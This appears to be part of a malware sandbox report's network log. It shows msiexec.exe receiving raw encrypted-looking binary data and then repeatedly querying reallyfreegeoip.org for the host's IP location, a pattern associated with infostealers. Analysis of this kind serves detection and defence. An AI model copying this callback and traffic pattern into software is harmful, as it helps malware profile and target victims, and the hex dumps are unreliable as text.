2024-11-25 17:43:45 UTC	4907	IN	Data Raw: 8c 34 0d b5 69 fc 90 e6 42 74 94 9e a5 32 a1 43 30 13 f7 09 03 cf 97 19 d4 6a 1d a5 05 7c af 96 61 67 00 7f 47 e0 50 2a d3 9c 31 1c 57 c3 37 ec 60 9b 07 38 ed 35 9d ca ad d1 64 0d ad 39 c9 cf a1 0b cd 72 a2 c9 58 81 f7 27 81 35 1f e9 84 99 df d1 f5 77 4d 38 8c e7 c6 59 50 c4 3a 4c f1 72 89 f9 ac fa 5d 5a 8e 33 83 7a 56 95 97 ce f0 d7 02 c6 03 69 7a cf 3a 4c 32 fe 8f 86 a2 64 de 96 00 6f e0 26 89 c5 50 14 2e 03 1e 86 d9 84 0b 47 84 9e 43 a6 f3 da 2f 43 ad ec 8c 49 77 18 36 54 7a b1 7d 13 ab 66 ab 9c d7 9e 84 37 26 8b b9 81 4e b2 37 98 c8 43 50 1f 67 bf c1 d4 1b d4 0a 4c a4 94 3f 08 76 ca 2b 7f d7 dd a1 bc 56 e9 39 60 5d 25 65 8e a9 83 86 af b5 78 c5 59 9e 59 f8 64 c7 fd 47 80 69 c4 75 40 df 8b f4 da 8c b7 9a a3 bc 25 80 82 bf 98 95 0e 3b 0a 99 da f4 fc 1f Data Ascii: 4iBt2C0j\|agGP*1W7`85d9rX'5wM8YP:Lr]Z3zViz:L2do&P.GC/CIw6Tz}f7&N7CPgL?v+V9`]%exYYdGiu@%;
2024-11-25 17:43:45 UTC	4886	IN	Data Raw: eb a0 b4 16 66 e8 e1 a3 cc f4 ec 10 01 f8 7d 94 4a d6 9c 4a 95 5d d3 9a 71 6b d4 c5 6a 90 47 d1 f3 3b 41 43 14 94 69 27 93 0a 04 30 67 62 25 18 5e 11 0f 9f c6 58 2f fe 97 d2 84 7e 2e ce 3f 31 7d bd 5f d0 a7 e0 16 36 c6 5c 2e 32 d2 95 59 52 73 a8 8b 63 88 f0 a2 94 d7 34 e1 3d 5e d7 73 3b 13 14 54 82 d2 0a 23 68 fd 8d f6 ff 07 73 28 3b 37 3f 79 21 57 09 ea 33 6d 40 65 8c 09 ea 8f 50 44 cd d5 52 6a 17 b0 22 2c cf d7 f3 cb 28 28 8c e6 ee d7 cd 4d 65 53 e6 a5 4b f2 62 5c 38 d4 1f 95 93 26 c4 c8 b2 cf f4 6b f1 2c 8f 15 fb 6f 7d 85 ce 8e 83 58 49 a8 0d 41 b4 9e 4d 69 b1 5f f2 c3 e6 7d 5d 32 85 f4 75 bd 64 00 7d fc ec 99 0c ac cd cb 91 13 cf d2 9c a4 66 0c 75 8e 7b 99 ed 68 54 8c 51 09 68 97 3c 04 dd 63 92 ca 7b 38 f0 54 9a c6 1d c2 c2 40 3a 6f 99 9c 13 5f 44 a3 Data Ascii: f}JJ]qkjG;ACi'0gb%^X/~.?1}_6\.2YRsc4=^s;T#hs(;7?y!W3m@ePDRj",((MeSKb\8&k,o}XIAMi_}]2ud}fu{hTQh<c{8T@:o_D
2024-11-25 17:43:45 UTC	1321	IN	Data Raw: 47 12 d1 0d d0 d7 66 ac d8 48 51 71 8e 91 c6 d7 8d d8 e3 fa 54 52 b2 63 68 f2 5d 61 bc 6d a4 0b 88 d0 ad 6b 33 0a 94 4f 0e 7e 29 28 32 fa 6d 8d f8 ec 10 71 af d9 18 16 e7 18 5b ed 24 14 b7 64 13 a1 aa fa 74 e9 29 7c 2d 30 7b ea 76 9a ce 3d 01 35 6b f9 4f a2 f5 d3 b3 cb ed 8d 03 40 93 fe c3 0c 99 8f 2a ac 9e f0 a7 7d e6 d1 d0 1e 2c ab ba 58 34 73 8a 61 cf de 2e 92 97 5f 8f c4 7e 6d 0d 92 08 e5 cd b9 6d aa 8c 0c 71 22 19 43 03 fb 3a c2 b3 fd ac 39 1f 29 ca 45 12 56 c1 32 db 03 af 20 c7 10 05 35 82 24 61 d3 56 8d ab 86 76 6e af fd 76 7f 25 dc c6 7f 1e fe f0 11 ce 6c f1 35 26 5d ce 55 e9 d2 a6 72 b6 82 da d5 2f c6 eb 0e fa 97 d6 7b 5b 24 06 d0 5f 1e 1c 5c cc 18 bc f7 82 06 c5 78 1d 60 cf e3 39 cc 58 f8 e4 17 39 ef 6b 07 78 08 1a e6 ac 47 f8 a2 7c cf 5a ec dd Data Ascii: GfHQqTRch]amk3O~)(2mq[$dt)\|-0{v=5kO@*},X4sa._~mmq"C:9)EV2 5$aVvnv%l5&]Ur/{[$_\x`9X9kxG\|Z
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: 85 d7 df 4e ea 6b c7 0f 99 91 9e 0a 73 cc 07 90 e6 e2 56 08 ed 16 1c 84 85 e8 2d 7a 57 8a a0 3c 6b 08 18 68 56 b5 e1 68 d9 ea ff 53 dd ca 51 4c 58 c7 4d 8a 45 3e a2 b1 b9 74 c0 32 3e 48 45 d5 48 19 44 0b 82 12 af ba bd 2c a8 b2 a1 f8 8c 6e 61 db 7a 60 2e f7 8b 91 f0 05 3c 2c 35 e3 ed 32 e5 b6 26 6c 59 e8 44 c2 bc ba cb 3b 63 3c 69 d2 09 f1 d6 c5 1e b2 af 4f ac c2 d8 ca 1b 9c d1 c6 a9 db d5 0e ac 98 d8 98 a5 94 90 b8 76 2e 30 22 a0 d1 33 2a 18 97 2c 24 8b f6 f6 cb 5b 94 d6 08 00 f8 13 b2 6d 2b 1a ed ba 07 e8 c7 20 7c c3 8f 16 84 cd ef 15 56 f2 bf b8 06 51 01 b5 c9 fc 28 c6 3f 6d bd 0f c7 b8 d0 8d 32 f8 64 5d 95 5e 78 47 9a 41 ac 03 ed 07 d0 10 3a db a8 97 fa 78 7e 90 06 8f af 7b aa 98 e0 80 59 cf 0b 17 78 83 f4 6e d7 d4 69 5a e7 10 22 77 64 e1 b0 7e ce 10 Data Ascii: NksV-zW<khVhSQLXME>t2>HEHD,naz`.<,52&lYD;c<iOv.0"3*,$[m+ \|VQ(?m2d]^xGA:x~{YxniZ"wd~
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: 14 63 e2 18 84 16 ab b2 80 2a bd fa c3 a2 3c 43 ad dc 2b 51 8a fb 79 fc ba 0e 09 94 97 8d 4f 42 13 41 4e 74 05 b2 62 73 d2 4e d4 78 a6 1e 50 c6 4f ac 08 2c 9f 1b 71 35 08 24 67 2b 03 02 44 0e cf ce 5c c5 7f 92 98 45 f4 13 de 0e 12 ee 65 6e c8 aa c8 4a 80 fe 07 b8 31 f2 db 2b 08 4d 33 fd 00 da d6 ad a2 2f ce 58 d0 74 eb 8b d9 c8 e1 32 8e 9f a0 b5 c8 04 fe d5 80 3e 39 02 ba 5b 37 c6 9c 38 1f bd 07 71 1c 28 9c 1d b3 33 69 a9 b9 eb f3 8f a6 48 9b 08 82 11 03 cf 76 bd 7d 37 8d 3c 5c 0d 4f 58 e7 f2 32 fb 52 3f e2 c6 d4 4d a1 04 92 f0 c3 d4 9c 16 81 77 7d b6 71 d6 b4 64 8f 1a b2 9c 38 65 05 d5 06 73 41 1f 8b 89 a3 5d d2 63 2d 9c 47 75 fa a1 c9 52 97 0d 26 92 3c f1 1f a8 95 76 d9 e2 18 9c 38 8c ed 86 59 7b cf 3a 5d f9 64 e6 28 ac fa 57 5a 8e 22 8b 04 68 95 97 ca Data Ascii: c*<C+QyOBANtbsNxPO,q5$g+D\EenJ1+M3/Xt2>9[78q(3iHv}7<\OX2R?Mw}qd8esA]c-GuR&<v8Y{:]d(WZ"h
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: c3 dc d7 1b be 3a a1 e2 3f 2f 56 e4 02 29 02 71 3b 00 d9 2d 0c d0 85 33 55 79 2a f8 2a 59 5a f9 ea c7 b6 27 1d b6 a8 c2 cd 64 5f 82 fa 2a 0f 69 47 85 b2 33 f1 e0 f0 a4 01 d0 f4 62 4d f7 a1 3a f8 d6 ad 00 ad 5d d9 8d dc 4e e6 d5 00 9f 4d 7f 51 1e 70 3d 08 d5 25 23 fc fd 04 30 6d 9a 00 04 2c 26 1a 9f b6 6b 06 82 97 dc 8e 75 06 72 3f 31 77 b8 30 8c a7 4d 1d 3a ce 4d 05 32 d4 77 43 62 7a a6 45 64 88 f0 83 94 d7 25 e1 43 42 d6 73 3f 7c 36 55 82 d8 a0 78 69 fd ed e0 d7 8f 36 28 31 20 da 4a 28 51 48 46 34 6d 53 1b bf 18 ea 8b 50 71 c6 d5 52 76 39 57 41 2c c5 cb 12 ea dd 2b a6 c7 fe d2 e1 54 b3 19 c6 b3 25 be 4f 5c 32 d4 6d b4 98 20 db bc 3f cc fe 74 d0 f7 9b 78 b9 7e 7b ad ed 8c 95 47 6f a8 a8 41 b4 9e 35 89 a6 54 85 ed 95 3d 5d 38 fd b3 06 db 60 28 3d f1 e5 91 Data Ascii: :?/V)q;-3Uy*YZ'd_iG3bM:]NMQp=%#0m,&kur?1w0M:M2wCbzEd%CBs?\|6Uxi6(1 J(QHF4mSPqRv9WA,+T%O\2m ?tx~{GoA5T=]8`(=
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: 53 6d 3b 10 c8 2c 76 90 d7 39 77 30 7e f0 29 83 2d ba dc 9f fe 95 18 58 f0 b7 ab bd e9 e0 fd ac 40 f4 a7 44 b8 fd d8 05 39 d3 d4 04 34 79 80 ae 08 dc 13 c8 c3 4e 8f be 02 b6 0d ba 60 e5 dc ab a1 db 04 65 1b 4d c6 43 7d c3 3a d3 af e0 1b 3b 1f 53 cf 77 8b 4c d0 21 db ec b7 bd a8 6e 5d 0c 41 2c 61 c2 32 cd 1a 86 72 16 9e ee 6e 60 d2 f4 4e 75 0d ef f7 f4 a0 ff f6 24 2b 77 e4 45 f3 a1 16 66 48 8e f4 c9 3e dc f7 4b fa 97 d6 40 8e 35 1a b5 ed 6d d5 56 cc 03 b5 90 22 0e bb 48 1d 71 d0 ff 11 cc 58 f8 8b dc 01 2c 61 07 69 00 75 3c 84 3a f2 dc 4b cf 7a e8 be 70 71 d5 22 2e 83 bd 45 cc 73 5f 44 1d a5 fc 5a 42 08 6f d6 9f ba 47 f8 fa d8 69 06 a4 ee c1 61 96 78 7b 9c f1 2d e6 2e 10 82 b2 c4 bf 2f 34 8c 74 da 0c b6 45 0f ce 45 27 3b 97 47 6b c9 84 c6 7c dd 90 67 a0 c7 Data Ascii: Sm;,v9w0~)-X@D94yN`eMC}:;SwL!n]A,a2rn`Nu$+wEfH>K@5mV"HqX,aiu<:Kzpq".Es_DZBoGiax{-./4tEE';Gk\|g
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: 11 53 3e 6a d1 b0 d1 49 e7 ff 8f 5e 68 84 f1 f8 2b 7e 8d ac 4e 43 f8 17 14 3b f2 68 87 bf 68 5c 65 05 6d bd 8d 4c 84 c9 47 2d c7 c0 c7 b7 07 04 b5 ef 41 e9 28 bc f2 14 aa 27 76 ab f1 9c 1d 9d 7c 2f d2 74 6e 45 94 76 b5 0d 77 22 c7 3c 23 fe b2 ef 63 5e 66 92 e2 a5 b4 75 28 bd f9 fa c3 ea 17 61 da b0 ee 6c 4e ff 15 2a 45 32 31 2b 64 eb a9 50 df 30 25 5f d1 97 0b bf 8c 8b 9d 2d e3 b7 0a 0e 6d 37 5c 3b dc 14 55 c3 74 96 68 b9 cf e1 e1 4d 98 fc a8 13 79 c3 33 59 2b 24 97 5b 3e e4 38 1a df 97 b8 04 d1 22 67 9d 7f 45 55 23 ff 4e 14 fb 64 0c 1b 20 12 4d b7 6c eb ce 48 7a f0 f2 d9 e6 15 93 6f 4e c8 1a 73 f3 0b 57 52 1f eb f4 8f f9 f2 6e e2 53 3f d4 b9 a8 35 59 8d d6 f0 8d 49 3d 92 fb 98 ff 1f 34 3b 8e 14 9a 6c 33 01 c9 bb e3 30 48 63 0c ef 83 d9 03 a8 da cc cc 12 Data Ascii: S>jI^h+~NC;hh\emLG-A('v\|/tnEvw"<#c^fu(alN*E21+dP0%_-m7\;UthMy3Y+$[>8"gEU#Nd MlHzoNsWRnS?5YI=4;l30Hc
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: 16 75 79 22 e7 81 49 14 6d f2 82 11 6d 03 c5 de f7 a8 45 a1 24 5c 03 c6 70 9b f6 41 05 f0 17 94 d5 d3 56 b4 74 38 08 d5 de fd 6f f1 ad 7d b2 53 9f ca 58 85 68 36 fd e8 15 2d 9c 15 7b 39 3f 94 98 b2 07 c0 61 2d ea 51 80 0d a0 c9 58 a4 db 13 81 35 ea 05 a4 99 4f b3 f5 77 47 e6 8c e7 86 59 50 ba 0e 4c f1 76 fb ae ae fa 2d 4c a6 bb 83 7a 5c 83 69 cf e3 f6 13 e7 3a a7 7a cf 3a 64 68 fe 8f 8c 3f e9 9e 96 0e 71 7f 3e fb 85 4c d9 7f 19 3a dd 3c 1e 5f 2f e7 4f 46 ce f3 f3 47 31 bc 23 89 33 68 4e 58 3b 0a 33 3a 6c f9 2f dd f2 87 55 cf 0c 1c e4 ea a1 27 7f 76 e1 94 4e 4b 15 33 1d e9 a8 1b d4 00 23 a8 d1 3f 02 29 e9 33 f2 1f 5b 31 db 73 ff 4b 72 4a 25 15 2c 6c 94 ac 15 be 79 9f fb bb 57 8e 22 c8 e9 37 22 4c dd 0b 78 61 be f4 78 a9 8d e8 98 bf 65 f4 20 97 e4 d5 0e 31 Data Ascii: uy"ImmE$\pAVt8o}SXh6-{9?a-QX5OwGYPLv-Lz\i:z:dh?q>L:<_/OFG1#3hNX;3:l/U'vNK3#?)3[1sKrJ%,lyW"7"Lxaxe 1
2024-11-25 17:43:45 UTC	1390	IN	Data Raw: 2e 57 c7 7a 17 1f d2 5d 95 bd 03 22 68 f7 9d f6 d4 0c 36 39 33 20 4b 98 22 57 7b ea 33 7c 5b 1b b2 18 ea 8b 0a f4 c4 d5 28 0f c2 df 41 26 cf cc e4 95 ec 2c 9f e7 81 e9 e1 40 67 3f 05 b3 24 9c 0d 88 32 de 15 be 99 28 ba ac dd 1a fe 74 db d2 9c 01 92 a8 7b a9 cf 88 4b 57 4c ef 5c 41 b4 9e 54 63 b2 7c 97 c5 ce 37 83 32 83 f8 06 a5 4a 00 77 f5 97 0b 14 df da dd b9 91 a0 ba 96 b2 92 62 0f 85 6a 98 c7 55 8b 9c 74 21 48 69 3a 33 ce 64 94 91 de 38 f0 54 6c 0e 1d e8 c9 50 49 a6 99 9c 18 4c 2d d4 f7 d7 8b f2 05 7a af 2c fa 45 dd 9d 29 96 61 e0 ba 9c 11 45 9c a6 bf ca 26 c7 15 79 b4 69 e2 cd c4 f0 76 e5 16 8d ba e6 a1 0e 00 69 89 a3 ef f1 ce fc e9 cf 4f ba 24 82 6c bc e1 29 84 cc 75 5c 98 ef 1a 33 b8 f3 72 63 06 5b 0a 3b 85 ff 41 16 17 0e 55 92 ff c7 ea 96 2d dc d9 Data Ascii: .Wz]"h693 K"W{3\|[(A&,@g?$2(t{KWL\ATc\|72JwbjUt!Hi:3d8TlPIL-z,E)aE&yiviO$l)u\3rc[;AU-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49789	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:43:52 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 17:43:52 UTC	846	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:52 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520541 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVtaUOkhFPVWXTFSl%2B36iX4dkSBURTjFMhtwn5e6ChAM3GqnyTgONLKfzV88XZmDPg2LMgQBL0QHbwQxihCCG6WJNVWOtnbXqCeoRAPVFiEGiY6JDBPUEfZeKwfktyF4amOMTAPY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8371896c8443dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1655&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=698&delivery_rate=187419&cwnd=238&unsent_bytes=0&cid=fbf05ed3271e9ef8&ts=649&x=0"
2024-11-25 17:43:52 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49795	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:43:54 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 17:43:55 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:54 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520543 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnLhL%2BK8LpVOkZDGrYhvF7Gblksi%2B0ssYHBAqlimj9RwdoTCgELxI9J3t4kpezntN14jBGDlwgqryxv4W0DXQb0oS4bdg%2BVMhZFy2dvKSGt5VBJQxdA8DTygE82u77z1eH7lSFvA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e83719848f872a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2013&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1435594&cwnd=210&unsent_bytes=0&cid=83334dd5378cf2ac&ts=480&x=0"
2024-11-25 17:43:55 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49808	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:43:58 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-25 17:43:59 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:59 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520548 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJ5tdOhTgbp811JKo08reI0XlWynSRcrSu53QHTx0s2q%2B9MEZSMmMsqO1ZPoHOoKAvy%2BkN09k47q6EBCJho%2Bt7H%2BXCcYv1%2B4MBBNtFe43U8lMHs1JTJbr9Zro5h19Oige3z5hUK5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8371b2292e0c7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1702623&cwnd=194&unsent_bytes=0&cid=9fe9657282e2d8d8&ts=466&x=0"
2024-11-25 17:43:59 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49815	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:02 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 17:44:02 UTC	854	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:02 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520551 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UA9Fl1Lao5ghqqbY93Ix5OYM8coEbz4WjQJabNWwOa9QoMr11%2FEGuoxnFWQ2I6EOHFFrzJl%2FnxWfIhDElTw1RiRilO2J72540%2FX0RTRqx1%2FgsXl7lq7LtP12Ge8xEhDgHCjEjN%2Bg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8371c8bc9a0f90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1707&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1710603&cwnd=93&unsent_bytes=0&cid=b49758daf37dfd8c&ts=481&x=0"
2024-11-25 17:44:02 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49827	172.67.177.134	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:44:05 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-25 17:44:06 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:06 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 520555 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RF2SVNvQAll5DqOGK0V%2FL8Gcv17Hr8ARj6d5p%2FM0Ama6n2vG3UtmtMD0uNpVdr9jd7DE17olo0dhX6EMjY0mqiYeK1o9ffavXFGCv%2BqwD4V616J8s5HccVBK9BrVJgXRdwE3HicJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e8371df3e3a0c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1707602&cwnd=242&unsent_bytes=0&cid=463a311d5d66f231&ts=469&x=0"
2024-11-25 17:44:06 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United 